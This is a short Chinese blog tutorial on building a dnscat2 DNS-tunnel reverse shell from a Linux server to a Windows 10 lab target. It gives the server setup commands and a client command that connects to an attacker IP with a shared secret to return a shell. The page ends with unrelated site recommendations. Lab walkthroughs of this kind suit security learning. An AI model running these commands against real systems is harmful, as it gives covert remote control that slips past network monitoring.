使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

安鸾彭于晏2024-07-18 22:39
  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
取个名字太难了a3 分钟前
Win7 x64 内存管理(一)
windows
mqffc21 分钟前
Linux(CentOS)安装 MySQL
linux·mysql·centos
一名优秀的码农23 分钟前
vulhub系列-02-Raven2(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
IT 行者1 小时前
OpenClaw 浏览器自动化测试的那些坑(一):Linux Snap 版本的 Chromium 无法使用托管模式
linux·运维·服务器·人工智能
Tangcan-1 小时前
在Ubuntu 22.04上安装redis
linux·redis·ubuntu
枷锁—sha1 小时前
【CTFshow-pwn系列】03_栈溢出【pwn 046】详解:Ret2Libc 之 64位动态泄露
服务器·网络·安全·网络安全·系统安全
麦德泽特1 小时前
STM32与Linux的无缝协作:通过USB CDC/VCP实现高效数据交互
linux·stm32·单片机·嵌入式硬件·安全
t***44232 小时前
CORS:跨域访问、如何在Nginx中配置允许跨域访问
运维·nginx
程序员陆通3 小时前
零基础零成本把Clawdbot(OpenClaw)在Windows电脑上部署起来
windows
RisunJan3 小时前
Linux命令-lvdisplay(显示逻辑卷属性)
linux·运维·服务器
热门推荐
01从零搭建一个 PHP 登录注册系统(含完整源码)02使用 1panel面板 部署 php网站03PHP Error: 常见错误及其解决方法04openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南05GitHub 镜像站点06Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services07UV安装并设置国内源08配置 OpenClaw 使用 Ollama 本地模型09全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)10AI工具实践日记(二):在 OpenClaw 中调用 OpenCode 进行开发任务